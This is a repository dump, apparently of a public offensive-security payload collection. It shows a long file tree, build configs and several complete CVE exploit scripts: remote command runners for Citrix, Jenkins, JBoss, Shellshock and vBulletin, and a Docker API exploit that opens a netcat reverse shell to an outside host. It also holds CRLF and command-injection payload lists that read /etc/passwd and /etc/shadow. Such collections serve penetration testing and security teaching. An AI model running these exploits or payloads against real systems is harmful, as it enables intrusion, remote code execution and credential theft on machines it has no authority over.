├── .github ├── .markdownlint.json ├── FUNDING.yml ├── banner.png ├── hopla_config.json ├── overrides │ └── main.html └── workflows │ ├── check-markdown.yml │ └── mkdocs-build.yml ├── .gitignore ├── API Key Leaks ├── Files │ └── MachineKeys.txt ├── IIS-Machine-Keys.md └── README.md ├── Account Takeover ├── README.md └── mfa-bypass.md ├── Business Logic Errors └── README.md ├── CONTRIBUTING.md ├── CORS Misconfiguration └── README.md ├── CRLF Injection ├── Files │ └── crlfinjection.txt └── README.md ├── CSV Injection └── README.md ├── CVE Exploits ├── Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py ├── Apache Struts 2 CVE-2017-9805.py ├── Apache Struts 2 CVE-2018-11776.py ├── Citrix CVE-2019-19781.py ├── Docker API RCE.py ├── Drupalgeddon2 CVE-2018-7600.rb ├── Heartbleed CVE-2014-0160.py ├── JBoss CVE-2015-7501.py ├── Jenkins CVE-2015-8103.py ├── Jenkins CVE-2016-0792.py ├── Jenkins Groovy Console.py ├── Log4Shell.md ├── README.md ├── Rails CVE-2019-5420.rb ├── Shellshock CVE-2014-6271.py ├── Telerik CVE-2017-9248.py ├── Telerik CVE-2019-18935.py ├── Tomcat CVE-2017-12617.py ├── WebLogic CVE-2016-3510.py ├── WebLogic CVE-2017-10271.py ├── WebLogic CVE-2018-2894.py ├── WebSphere CVE-2015-7450.py └── vBulletin RCE 5.0.0 - 5.5.4.sh ├── Clickjacking └── README.md ├── Client Side Path Traversal └── README.md ├── Command Injection ├── Intruder │ ├── command-execution-unix.txt │ └── command_exec.txt └── README.md ├── Cross-Site Request Forgery ├── Images │ └── CSRF-CheatSheet.png └── README.md ├── DISCLAIMER.md ├── DNS Rebinding └── README.md ├── DOM Clobbering └── README.md ├── Denial of Service └── README.md ├── Dependency Confusion └── README.md ├── Directory Traversal ├── Intruder │ ├── deep_traversal.txt │ ├── directory_traversal.txt │ ├── dotdotpwn.txt │ └── traversals-8-deep-exotic-encoding.txt └── README.md ├── External Variable Modification └── README.md ├── File Inclusion ├── Files │ ├── LFI2RCE.py │ ├── phpinfolfi.py │ └── uploadlfi.py ├── 
Intruders │ ├── BSD-files.txt │ ├── JHADDIX_LFI.txt │ ├── LFI-FD-check.txt │ ├── LFI-WindowsFileCheck.txt │ ├── Linux-files.txt │ ├── List_Of_File_To_Include.txt │ ├── List_Of_File_To_Include_NullByteAdded.txt │ ├── Mac-files.txt │ ├── Traversal.txt │ ├── Web-files.txt │ ├── Windows-files.txt │ ├── dot-slash-PathTraversal_and_LFI_pairing.txt │ ├── php-filter-iconv.txt │ └── simple-check.txt ├── LFI-to-RCE.md ├── README.md └── Wrappers.md ├── Google Web Toolkit └── README.md ├── GraphQL Injection ├── Images │ └── htb-help.png └── README.md ├── HTTP Parameter Pollution └── README.md ├── Headless Browser ├── README.md └── files │ ├── iframe.html │ └── window_location_js.html ├── Hidden Parameters └── README.md ├── Insecure Deserialization ├── DotNET.md ├── Files │ ├── Ruby_universal_gadget_generate_verify.rb │ ├── node-serialize.js │ └── ruby-serialize.yaml ├── Images │ └── NETNativeFormatters.png ├── Java.md ├── Node.md ├── PHP.md ├── Python.md ├── README.md └── Ruby.md ├── Insecure Direct Object References ├── Images │ └── idor.png └── README.md ├── Insecure Management Interface ├── Intruder │ └── springboot_actuator.txt └── README.md ├── Insecure Randomness └── README.md ├── Insecure Source Code Management ├── Bazaar.md ├── Files │ └── github-dorks.txt ├── Git.md ├── Mercurial.md ├── README.md └── Subversion.md ├── JSON Web Token └── README.md ├── Java RMI └── README.md ├── LDAP Injection ├── Intruder │ ├── LDAP_FUZZ.txt │ ├── LDAP_FUZZ_SMALL.txt │ └── LDAP_attributes.txt └── README.md ├── LICENSE ├── LaTeX Injection └── README.md ├── Mass Assignment └── README.md ├── Methodology and Resources ├── Active Directory Attack.md ├── Bind Shell Cheatsheet.md ├── Cloud - AWS Pentest.md ├── Cloud - Azure Pentest.md ├── Cobalt Strike - Cheatsheet.md ├── Container - Docker Pentest.md ├── Container - Kubernetes Pentest.md ├── Escape Breakout.md ├── HTML Smuggling.md ├── Hash Cracking.md ├── Initial Access.md ├── Linux - Evasion.md ├── Linux - Persistence.md ├── Linux - 
Privilege Escalation.md ├── MSSQL Server - Cheatsheet.md ├── Metasploit - Cheatsheet.md ├── Methodology and enumeration.md ├── Network Discovery.md ├── Network Pivoting Techniques.md ├── Office - Attacks.md ├── Powershell - Cheatsheet.md ├── Reverse Shell Cheatsheet.md ├── Source Code Management.md ├── Vulnerability Reports.md ├── Web Attack Surface.md ├── Windows - AMSI Bypass.md ├── Windows - DPAPI.md ├── Windows - Defenses.md ├── Windows - Download and Execute.md ├── Windows - Mimikatz.md ├── Windows - Persistence.md ├── Windows - Privilege Escalation.md └── Windows - Using credentials.md ├── NoSQL Injection ├── Intruder │ ├── MongoDB.txt │ └── NoSQL.txt └── README.md ├── OAuth Misconfiguration └── README.md ├── ORM Leak └── README.md ├── Open Redirect ├── Intruder │ ├── Open-Redirect-payloads.txt │ ├── open_redirect_wordlist.txt │ └── openredirects.txt └── README.md ├── Prompt Injection └── README.md ├── Prototype Pollution └── README.md ├── README.md ├── Race Condition └── README.md ├── Regular Expression └── README.md ├── Request Smuggling └── README.md ├── SAML Injection ├── Images │ ├── SAML-xml-flaw.png │ └── XSLT1.jpg └── README.md ├── SQL Injection ├── BigQuery Injection.md ├── Cassandra Injection.md ├── DB2 Injection.md ├── Images │ ├── PostgreSQL_cmd_exec.png │ ├── Unicode_SQL_injection.png │ └── wildcard_underscore.jpg ├── Intruder │ ├── Auth_Bypass.txt │ ├── Auth_Bypass2.txt │ ├── FUZZDB_MSSQL-WHERE_Time.txt │ ├── FUZZDB_MSSQL.txt │ ├── FUZZDB_MSSQL_Enumeration.txt │ ├── FUZZDB_MYSQL.txt │ ├── FUZZDB_MySQL-WHERE_Time.txt │ ├── FUZZDB_MySQL_ReadLocalFiles.txt │ ├── FUZZDB_Oracle.txt │ ├── FUZZDB_Postgres_Enumeration.txt │ ├── Generic_ErrorBased.txt │ ├── Generic_Fuzz.txt │ ├── Generic_TimeBased.txt │ ├── Generic_UnionSelect.txt │ ├── SQL-Injection │ ├── SQLi_Polyglots.txt │ ├── payloads-sql-blind-MSSQL-INSERT │ ├── payloads-sql-blind-MSSQL-WHERE │ ├── payloads-sql-blind-MySQL-INSERT │ ├── payloads-sql-blind-MySQL-ORDER_BY │ └── 
payloads-sql-blind-MySQL-WHERE ├── MSSQL Injection.md ├── MySQL Injection.md ├── OracleSQL Injection.md ├── PostgreSQL Injection.md ├── README.md ├── SQLite Injection.md └── SQLmap.md ├── Server Side Include Injection ├── Files │ └── ssi_esi.txt └── README.md ├── Server Side Request Forgery ├── Files │ ├── SSRF_expect.svg │ ├── SSRF_url.svg │ ├── ip.py │ ├── ssrf_ffmpeg.avi │ ├── ssrf_iframe.svg │ ├── ssrf_svg_css_import.svg │ ├── ssrf_svg_css_link.svg │ ├── ssrf_svg_css_xmlstylesheet.svg │ ├── ssrf_svg_image.svg │ └── ssrf_svg_use.svg ├── Images │ ├── Parser and Curl less than 7.54.png │ ├── SSRF_PDF.png │ ├── SSRF_Parser.png │ ├── SSRF_stream.png │ ├── WeakParser.jpg │ └── aws-cli.jpg ├── README.md ├── SSRF-Advanced-Exploitation.md └── SSRF-Cloud-Instances.md ├── Server Side Template Injection ├── ASP.md ├── Images │ ├── serverside.png │ └── template-library.jpg ├── Intruder │ └── ssti.fuzz ├── Java.md ├── JavaScript.md ├── PHP.md ├── Python.md ├── README.md └── Ruby.md ├── Tabnabbing └── README.md ├── Type Juggling ├── Images │ └── table_representing_behavior_of_PHP_with_loose_type_comparisons.png └── README.md ├── Upload Insecure Files ├── CVE FFmpeg HLS │ ├── gen_avi_bypass.py │ ├── gen_xbin_avi.py │ ├── read_passwd.avi │ ├── read_passwd_bypass.mp4 │ ├── read_shadow.avi │ └── read_shadow_bypass.mp4 ├── CVE ZIP Symbolic Link │ ├── etc_passwd.zip │ ├── generate.sh │ └── passwd ├── Configuration Apache .htaccess │ ├── .htaccess │ ├── .htaccess_phpinfo │ ├── .htaccess_rce_files │ ├── .htaccess_shell │ └── README.md ├── Configuration IIS web.config │ └── web.config ├── Configuration Python __init__.py │ ├── python-admin-__init__.py.zip │ ├── python-conf-__init__.py.zip │ ├── python-config-__init__.py.zip │ ├── python-controllers-__init__.py.zip │ ├── python-generate-init.py │ ├── python-login-__init__.py.zip │ ├── python-models-__init__.py.zip │ ├── python-modules-__init__.py.zip │ ├── python-scripts-__init__.py.zip │ ├── python-settings-__init__.py.zip │ ├── 
python-tests-__init__.py.zip │ ├── python-urls-__init__.py.zip │ ├── python-utils-__init__.py.zip │ └── python-view-__init__.py.zip ├── Configuration uwsgi.ini │ └── uwsgi.ini ├── EICAR │ └── eicar.txt ├── Extension ASP │ ├── shell.asa │ ├── shell.ashx │ ├── shell.asmx │ ├── shell.asp │ ├── shell.aspx │ ├── shell.cer │ ├── shell.soap │ └── shell.xamlx ├── Extension HTML │ └── xss.html ├── Extension PHP │ ├── extensions.lst │ ├── php-script-tag.php │ ├── phpinfo.jpg.php │ ├── phpinfo.phar │ ├── phpinfo.php │ ├── phpinfo.php3 │ ├── phpinfo.php4 │ ├── phpinfo.php5 │ ├── phpinfo.php7 │ ├── phpinfo.php8 │ ├── phpinfo.phpt │ ├── phpinfo.pht │ ├── phpinfo.phtml │ ├── shell.gif^shell.php │ ├── shell.jpeg.php │ ├── shell.jpg.php │ ├── shell.jpg^shell.php │ ├── shell.pgif │ ├── shell.phar │ ├── shell.php │ ├── shell.php3 │ ├── shell.php4 │ ├── shell.php5 │ ├── shell.php7 │ ├── shell.phpt │ ├── shell.pht │ ├── shell.phtml │ ├── shell.png.php │ ├── shell.png^shell.php │ └── tiny.php ├── Images │ └── file-upload-mindmap.png ├── Jetty RCE │ └── JettyShell.xml ├── Picture Compression │ ├── GIF_exploit.gif │ ├── JPG_exploit-55.jpg │ ├── PNG_110x110_resize_bypass_use_LFI.png │ ├── PNG_32x32_resize_bypass_use_LFI.png │ ├── createBulletproofJPG.py │ ├── createCompressedPNG_110x110.php │ ├── createGIFwithGlobalColorTable.php │ └── createPNGwithPLTE.php ├── Picture ImageMagick │ ├── convert_local_etc_passwd.svg │ ├── convert_local_etc_passwd_html.svg │ ├── ghostscript_rce_curl.jpg │ ├── imagemagick_CVE-2022-44268_convert_etc_passwd.png │ ├── imagemagick_ghostscript_cmd_exec.pdf │ ├── imagemagik_ghostscript_reverse_shell.jpg │ ├── imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg │ ├── imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg │ ├── imagetragik1_payload_imageover_reverse_shell_devtcp.jpg │ ├── imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png │ ├── imagetragik1_payload_imageover_wget.gif │ ├── imagetragik1_payload_url_bind_shell_nc.mvg 
│ ├── imagetragik1_payload_url_curl.png │ ├── imagetragik1_payload_url_portscan.jpg │ ├── imagetragik1_payload_url_remote_connection.mvg │ ├── imagetragik1_payload_url_reverse_shell_bash.mvg │ ├── imagetragik1_payload_url_touch.jpg │ ├── imagetragik1_payload_xml_reverse_shell_nctraditional.xml │ ├── imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml │ ├── imagetragik2_burpcollaborator_passwd.jpg │ ├── imagetragik2_centos_id.jpg │ ├── imagetragik2_ubuntu_id.jpg │ ├── imagetragik2_ubuntu_shell.jpg │ └── imagetragik2_ubuntu_shell2.jpg ├── Picture Metadata │ ├── Build_image_to_LFI.py │ ├── CVE-2021-22204_exiftool_echo.jpg │ ├── CVE-2021-22204_exiftool_revshell.jpg │ ├── PHP_exif_phpinfo.jpg │ ├── PHP_exif_system.gif │ ├── PHP_exif_system.jpg │ └── PHP_exif_system.png ├── README.md └── Server Side Include │ ├── exec.shtml │ ├── include.shtml │ └── index.stm ├── Web Cache Deception ├── Images │ └── wcd.jpg ├── Intruders │ └── param_miner_lowercase_headers.txt └── README.md ├── Web Sockets ├── Files │ └── ws-harness.py ├── Images │ ├── WebsocketHarness.jpg │ ├── sqlmap.png │ └── websocket-harness-start.png └── README.md ├── XPATH Injection └── README.md ├── XSLT Injection ├── Files │ ├── enum-system-version-vendor.xsl │ ├── file-write.xsl │ ├── rce-dotnet-2.xsl │ ├── rce-dotnet.xsl │ ├── rce-java-1.xsl │ ├── rce-java-2.xsl │ ├── rce-php-assert.xsl │ ├── rce-php-file-create.xsl │ ├── rce-php-file-read.xsl │ ├── rce-php-meterpreter.xsl │ ├── rce-php-scandir.xsl │ ├── read-and-ssrf.xsl │ ├── system-properties.xml │ ├── system-properties.xsl │ └── xxe.xsl └── README.md ├── XSS Injection ├── 1 - XSS Filter Bypass.md ├── 2 - XSS Polyglot.md ├── 3 - XSS Common WAF Bypass.md ├── 4 - CSP Bypass.md ├── 5 - XSS in Angular.md ├── Files │ ├── InsecureFlashFile.swf │ ├── JupyterNotebookXSS.ipynb │ ├── SVG_XSS1.svg │ ├── SVG_XSS2.svg │ ├── SVG_XSS3.svg │ ├── SVG_XSS_green_triangle.svg │ ├── SVG_XSS_nested_img_xlink.svg │ ├── SVG_XSS_nested_svg.svg │ ├── 
SVG_XSS_nested_use_xlink.svg │ ├── SVG_XSS_red_lightning.svg │ ├── SWF_XSS.swf │ ├── mouseover-xss-ecs.jpeg │ ├── onclick-xss-ecs.jpeg │ ├── payload_in_all_known_exif_corrupted.jpg │ ├── payload_in_all_known_exif_corrupted.png │ ├── payload_in_all_known_metadata.jpg │ ├── payload_in_all_known_metadata.png │ ├── payload_text_xss.png │ ├── xml.xsd │ ├── xss.cer │ ├── xss.dtd │ ├── xss.htm │ ├── xss.html.demo │ ├── xss.hxt │ ├── xss.mno │ ├── xss.rdf │ ├── xss.svgz │ ├── xss.url.url │ ├── xss.vml │ ├── xss.wsdl │ ├── xss.xht │ ├── xss.xhtml │ ├── xss.xml │ ├── xss.xsd │ ├── xss.xsf │ ├── xss.xsl │ ├── xss.xslt │ ├── xss_comment_exif_metadata_double_quote.png │ └── xss_comment_exif_metadata_single_quote.png ├── Images │ └── DwrkbH1VAAErOI2.jpg ├── Intruders │ ├── 0xcela_event_handlers.txt │ ├── BRUTELOGIC-XSS-JS.txt │ ├── BRUTELOGIC-XSS-STRINGS.txt │ ├── IntrudersXSS.txt │ ├── JHADDIX_XSS.txt │ ├── MarioXSSVectors.txt │ ├── RSNAKE_XSS.txt │ ├── XSSDetection.txt │ ├── XSS_Polyglots.txt │ ├── jsonp_endpoint.txt │ ├── port_swigger_xss_cheatsheet_event_handlers.txt │ ├── xss_alert.txt │ ├── xss_alert_identifiable.txt │ ├── xss_payloads_quick.txt │ └── xss_swf_fuzz.txt └── README.md ├── XXE Injection ├── Files │ ├── Classic XXE - etc passwd.xml │ ├── Classic XXE B64 Encoded.xml │ ├── Classic XXE.xml │ ├── Deny Of Service - Billion Laugh Attack │ ├── XXE OOB Attack (Yunusov, 2013).xml │ └── XXE PHP Wrapper.xml ├── Intruders │ ├── XXE_Fuzzing.txt │ └── xml-attacks.txt └── README.md ├── Zip Slip └── README.md ├── _LEARNING_AND_SOCIALS ├── BOOKS.md ├── TWITTER.md └── YOUTUBE.md ├── _template_vuln └── README.md ├── custom.css └── mkdocs.yml /.github/.markdownlint.json: -------------------------------------------------------------------------------- 1 | { 2 | "default": true, 3 | "MD013": false, 4 | "no-duplicate-heading": { 5 | "siblings_only": true 6 | }, 7 | "ul-indent": { 8 | "indent": 4 9 | } 10 | } 
-------------------------------------------------------------------------------- /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | # These are supported funding model platforms 2 | github: swisskyrepo 3 | ko_fi: swissky 4 | custom: https://www.buymeacoffee.com/swissky -------------------------------------------------------------------------------- /.github/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/.github/banner.png -------------------------------------------------------------------------------- /.github/overrides/main.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | 3 | {% block content %} 4 | {{ super() }} 5 |
6 | Share this content 7 |
19 | {% endblock %} 20 | 21 | {% block styles %} 22 | {{ super() }} 23 | 28 | {% endblock %} -------------------------------------------------------------------------------- /.github/workflows/check-markdown.yml: -------------------------------------------------------------------------------- 1 | name: check-markdown 2 | on: [push, pull_request] 3 | 4 | jobs: 5 | lint: 6 | runs-on: ubuntu-latest 7 | steps: 8 | - uses: actions/checkout@v4 9 | with: 10 | fetch-depth: 0 11 | 12 | - uses: tj-actions/changed-files@v45 13 | id: changed-files 14 | with: 15 | files: '**/*.md' 16 | separator: "," 17 | 18 | - uses: DavidAnson/markdownlint-cli2-action@v17 19 | if: steps.changed-files.outputs.any_changed == 'true' 20 | with: 21 | globs: ${{ steps.changed-files.outputs.all_changed_files }} 22 | separator: "," 23 | config: ./.github/.markdownlint.json -------------------------------------------------------------------------------- /.github/workflows/mkdocs-build.yml: -------------------------------------------------------------------------------- 1 | name: mkdocs-build 2 | on: 3 | push: 4 | branches: 5 | - master 6 | 7 | jobs: 8 | deploy: 9 | runs-on: ubuntu-latest 10 | steps: 11 | - uses: actions/checkout@v2 12 | with: 13 | submodules: recursive 14 | 15 | # Checks-out submodules 16 | - uses: actions/checkout@v2 17 | - name: Checkout submodules 18 | shell: bash 19 | run: | 20 | git config --global user.email "no-reply@github.com" 21 | git config --global user.name "Swk" 22 | git config --global pull.rebase false 23 | git submodule add https://github.com/swisskyrepo/PayloadsAllTheThings/ docs 24 | mv docs/.github/overrides . 
25 | 26 | - uses: actions/setup-python@v2 27 | with: 28 | python-version: 3.x 29 | - run: pip install mkdocs-material 30 | - run: pip install mkdocs-git-revision-date-localized-plugin 31 | - run: pip install mkdocs-git-committers-plugin 32 | - run: pip install mkdocs-material[imaging] 33 | - run: pip install mdx_truly_sane_lists 34 | - run: mkdocs gh-deploy --force 35 | 36 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | BuildPDF/ 2 | .vscode 3 | .todo -------------------------------------------------------------------------------- /CRLF Injection/Files/crlfinjection.txt: -------------------------------------------------------------------------------- 1 | /%%0a0aSet-Cookie:crlf=injection 2 | /%0aSet-Cookie:crlf=injection 3 | /%0d%0aSet-Cookie:crlf=injection 4 | /%0dSet-Cookie:crlf=injection 5 | /%23%0aSet-Cookie:crlf=injection 6 | /%23%0d%0aSet-Cookie:crlf=injection 7 | /%23%0dSet-Cookie:crlf=injection 8 | /%25%30%61Set-Cookie:crlf=injection 9 | /%25%30aSet-Cookie:crlf=injection 10 | /%250aSet-Cookie:crlf=injection 11 | /%25250aSet-Cookie:crlf=injection 12 | /%2e%2e%2f%0d%0aSet-Cookie:crlf=injection 13 | /%2f%2e%2e%0d%0aSet-Cookie:crlf=injection 14 | /%2F..%0d%0aSet-Cookie:crlf=injection 15 | /%3f%0d%0aSet-Cookie:crlf=injection 16 | /%3f%0dSet-Cookie:crlf=injection 17 | /%u000aSet-Cookie:crlf=injection 18 | -------------------------------------------------------------------------------- /CVE Exploits/Citrix CVE-2019-19781.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # https://github.com/mpgn/CVE-2019-19781 3 | # # # 4 | 5 | import requests 6 | import string 7 | import random 8 | import re 9 | import sys 10 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 11 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 12 | 13 | 
print("CVE-2019-19781 - Remote Code Execution in Citrix Application Delivery Controller and Citrix Gateway") 14 | print("Found by Mikhail Klyuchnikov") 15 | print("") 16 | 17 | if len(sys.argv) < 2: 18 | print("[-] No URL provided") 19 | sys.exit(0) 20 | 21 | while True: 22 | try: 23 | command = input("command > ") 24 | 25 | random_xml = ''.join(random.choices(string.ascii_uppercase + string.digits, k=12)) 26 | print("[+] Adding bookmark", random_xml + ".xml") 27 | 28 | burp0_url = sys.argv[1] + "/vpn/../vpns/portal/scripts/newbm.pl" 29 | burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" + 30 | random_xml, "NSC_NONCE": "c", "Connection": "close"} 31 | burp0_data = {"url": "http://exemple.com", "title": "[%t=template.new({'BLOCK'='print `" + str(command) + "`'})%][ % t % ]", "desc": "test", "UI_inuse": "RfWeb"} 32 | r = requests.post(burp0_url, headers=burp0_headers, data=burp0_data,verify=False) 33 | 34 | if r.status_code == 200: 35 | print("[+] Bookmark added") 36 | else: 37 | print("\n[-] Target not vulnerable or something went wrong") 38 | sys.exit(0) 39 | 40 | burp0_url = sys.argv[1] + "/vpns/portal/" + random_xml + ".xml" 41 | burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" + 42 | random_xml, "NSC_NONCE": "c", "Connection": "close"} 43 | r = requests.get(burp0_url, headers=burp0_headers,verify=False) 44 | 45 | replaced = re.sub('^&#.* $', '', r.text, flags=re.MULTILINE) 46 | print("[+] Result of the command: \n") 47 | print(replaced) 48 | 49 | except KeyboardInterrupt: 50 | print("Exiting...") 51 | break -------------------------------------------------------------------------------- /CVE Exploits/Docker API RCE.py: -------------------------------------------------------------------------------- 1 | from __future__ import print_function 2 | import requests 3 | import logging 4 | import json 5 | import urllib.parse 6 | 7 | # NOTE 8 | # Enable Remote API with the following command 9 | # /usr/bin/dockerd -H 
tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock 10 | # This is an intended feature, remember to filter the port 2375.. 11 | 12 | name = "docker" 13 | description = "Docker RCE via Open Docker API on port 2375" 14 | author = "Swissky" 15 | 16 | # Step 1 - Extract id and name from each container 17 | ip = "127.0.0.1" 18 | port = "2375" 19 | data = "containers/json" 20 | url = "http://{}:{}/{}".format(ip, port, data) 21 | r = requests.get(url) 22 | 23 | if r.json: 24 | for container in r.json(): 25 | container_id = container['Id'] 26 | container_name = container['Names'][0].replace('/','') 27 | print((container_id, container_name)) 28 | 29 | # Step 2 - Prepare command 30 | cmd = '["nc", "192.168.1.2", "4242", "-e", "/bin/sh"]' 31 | data = "containers/{}/exec".format(container_name) 32 | url = "http://{}:{}/{}".format(ip, port, data) 33 | post_json = '{ "AttachStdin":false,"AttachStdout":true,"AttachStderr":true, "Tty":false, "Cmd":'+cmd+' }' 34 | post_header = { 35 | "Content-Type": "application/json" 36 | } 37 | r = requests.post(url, json=json.loads(post_json)) 38 | 39 | 40 | # Step 3 - Execute command 41 | id_cmd = r.json()['Id'] 42 | data = "exec/{}/start".format(id_cmd) 43 | url = "http://{}:{}/{}".format(ip, port, data) 44 | post_json = '{ "Detach":false,"Tty":false}' 45 | post_header = { 46 | "Content-Type": "application/json" 47 | } 48 | r = requests.post(url, json=json.loads(post_json)) 49 | print(r) -------------------------------------------------------------------------------- /CVE Exploits/JBoss CVE-2015-7501.py: -------------------------------------------------------------------------------- 1 | #! 
/usr/bin/env python2 2 | 3 | # Jboss Java Deserialization RCE (CVE-2015-7501) 4 | # Made with <3 by @byt3bl33d3r 5 | 6 | from __future__ import print_function 7 | import requests 8 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 9 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 10 | 11 | import argparse 12 | import sys, os 13 | #from binascii import hexlify, unhexlify 14 | from subprocess import check_output 15 | 16 | ysoserial_default_paths = ['./ysoserial.jar', '../ysoserial.jar'] 17 | ysoserial_path = None 18 | 19 | parser = argparse.ArgumentParser() 20 | parser.add_argument('target', type=str, help='Target IP') 21 | parser.add_argument('command', type=str, help='Command to run on target') 22 | parser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)') 23 | parser.add_argument('--ysoserial-path', metavar='PATH', type=str, help='Path to ysoserial JAR (default: tries current and previous directory)') 24 | 25 | if len(sys.argv) < 2: 26 | parser.print_help() 27 | sys.exit(1) 28 | 29 | args = parser.parse_args() 30 | 31 | if not args.ysoserial_path: 32 | for path in ysoserial_default_paths: 33 | if os.path.exists(path): 34 | ysoserial_path = path 35 | else: 36 | if os.path.exists(args.ysoserial_path): 37 | ysoserial_path = args.ysoserial_path 38 | 39 | if ysoserial_path is None: 40 | print('[-] Could not find ysoserial JAR file') 41 | sys.exit(1) 42 | 43 | if len(args.target.split(":")) != 2: 44 | print('[-] Target must be in format IP:PORT') 45 | sys.exit(1) 46 | 47 | if not args.command: 48 | print('[-] You must specify a command to run') 49 | sys.exit(1) 50 | 51 | ip, port = args.target.split(':') 52 | 53 | print('[*] Target IP: {}'.format(ip)) 54 | print('[*] Target PORT: {}'.format(port)) 55 | 56 | gadget = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections1', args.command]) 57 | 58 | r = 
requests.post('{}://{}:{}/invoker/JMXInvokerServlet'.format(args.proto, ip, port), verify=False, data=gadget) 59 | 60 | if r.status_code == 200: 61 | print('[+] Command executed successfully') 62 | 63 | -------------------------------------------------------------------------------- /CVE Exploits/Jenkins Groovy Console.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # SRC: https://raw.githubusercontent.com/bl4de/security-tools/master/jgc.py 3 | # DOC: https://medium.com/@_bl4de/remote-code-execution-with-groovy-console-in-jenkins-bd6ef55c285b 4 | from __future__ import print_function 5 | from builtins import input 6 | import requests 7 | import sys 8 | 9 | print(""" 10 | Jenkins Groovy Console cmd runner. 11 | 12 | usage: ./jgc.py [HOST] 13 | 14 | Then type any command and wait for STDOUT output from remote machine. 15 | Type 'exit' to exit :) 16 | """) 17 | URL = sys.argv[1] + '/scriptText' 18 | HEADERS = { 19 | 'User-Agent': 'jgc' 20 | } 21 | 22 | while 1: 23 | CMD = input(">> Enter command to execute (or type 'exit' to exit): ") 24 | if CMD == 'exit': 25 | print("exiting...\n") 26 | exit(0) 27 | 28 | DATA = { 29 | 'script': 'println "{}".execute().text'.format(CMD) 30 | } 31 | result = requests.post(URL, headers=HEADERS, data=DATA) 32 | print(result.text) -------------------------------------------------------------------------------- /CVE Exploits/Shellshock CVE-2014-6271.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # Successful Output: 4 | # # python shell_shocker.py 5 | # [+] Attempting Shell_Shock - Make sure to type full path 6 | # ~$ /bin/ls / 7 | # bin 8 | # boot 9 | # dev 10 | # etc 11 | # .. 
12 | # ~$ /bin/cat /etc/passwd 13 | 14 | from __future__ import print_function 15 | from future import standard_library 16 | standard_library.install_aliases() 17 | from builtins import input 18 | import sys, urllib.request, urllib.error, urllib.parse 19 | 20 | if len(sys.argv) != 2: 21 | print("Usage: shell_shocker ") 22 | sys.exit(0) 23 | 24 | URL=sys.argv[1] 25 | print("[+] Attempting Shell_Shock - Make sure to type full path") 26 | 27 | while True: 28 | command=input("~$ ") 29 | opener=urllib.request.build_opener() 30 | opener.addheaders=[('User-agent', '() { foo;}; echo Content-Type: text/plain ; echo ; '+command)] 31 | try: 32 | response=opener.open(URL) 33 | for line in response.readlines(): 34 | print(line.strip()) 35 | except Exception as e: print(e) 36 | 37 | -------------------------------------------------------------------------------- /CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh: -------------------------------------------------------------------------------- 1 | curl https://example.com/index.php\?routestring\=ajax/render/widget_php --connect-timeout 5 --max-time 15 -s -k --data "widgetConfig[code]=echo system('id');exit;" -------------------------------------------------------------------------------- /Command Injection/Intruder/command-execution-unix.txt: -------------------------------------------------------------------------------- 1 | <!--#exec%20cmd="/bin/cat%20/etc/passwd"--> 2 | <!--#exec%20cmd="/bin/cat%20/etc/shadow"--> 3 | <!--#exec%20cmd="/usr/bin/id;--> 4 | <!--#exec%20cmd="/usr/bin/id;--> 5 | /index.html|id| 6 | ";id;" 7 | ';id;' 8 | ;id; 9 | ;id 10 | ;netstat -a; 11 | "|id|" 12 | '|id|' 13 | |id 14 | |/usr/bin/id 15 | |id| 16 | "|/usr/bin/id|" 17 | '|/usr/bin/id|' 18 | |/usr/bin/id| 19 | "||/usr/bin/id|" 20 | '||/usr/bin/id|' 21 | ||/usr/bin/id| 22 | |id; 23 | ||/usr/bin/id; 24 | ;id| 25 | ;|/usr/bin/id| 26 | "\n/bin/ls -al\n" 27 | '\n/bin/ls -al\n' 28 | \n/bin/ls -al\n 29 | \n/usr/bin/id\n 30 | \nid\n 31 | \n/usr/bin/id; 32 | \nid; 
33 | \n/usr/bin/id| 34 | \nid| 35 | ;/usr/bin/id\n 36 | ;id\n 37 | |usr/bin/id\n 38 | |nid\n 39 | `id` 40 | `/usr/bin/id` 41 | a);id 42 | a;id 43 | a);id; 44 | a;id; 45 | a);id| 46 | a;id| 47 | a)|id 48 | a|id 49 | a)|id; 50 | a|id 51 | |/bin/ls -al 52 | a);/usr/bin/id 53 | a;/usr/bin/id 54 | a);/usr/bin/id; 55 | a;/usr/bin/id; 56 | a);/usr/bin/id| 57 | a;/usr/bin/id| 58 | a)|/usr/bin/id 59 | a|/usr/bin/id 60 | a)|/usr/bin/id; 61 | a|/usr/bin/id 62 | ;system('cat%20/etc/passwd') 63 | ;system('id') 64 | ;system('/usr/bin/id') 65 | %0Acat%20/etc/passwd 66 | %0A/usr/bin/id 67 | %0Aid 68 | %22%0A/usr/bin/id%0A%22 69 | %27%0A/usr/bin/id%0A%27 70 | %0A/usr/bin/id%0A 71 | %0Aid%0A 72 | "& ping -i 30 127.0.0.1 &" 73 | '& ping -i 30 127.0.0.1 &' 74 | & ping -i 30 127.0.0.1 & 75 | & ping -n 30 127.0.0.1 & 76 | %0a ping -i 30 127.0.0.1 %0a 77 | `ping 127.0.0.1` 78 | | id 79 | & id 80 | ; id 81 | %0a id %0a 82 | `id` 83 | $;/usr/bin/id 84 | -------------------------------------------------------------------------------- /Cross-Site Request Forgery/Images/CSRF-CheatSheet.png: 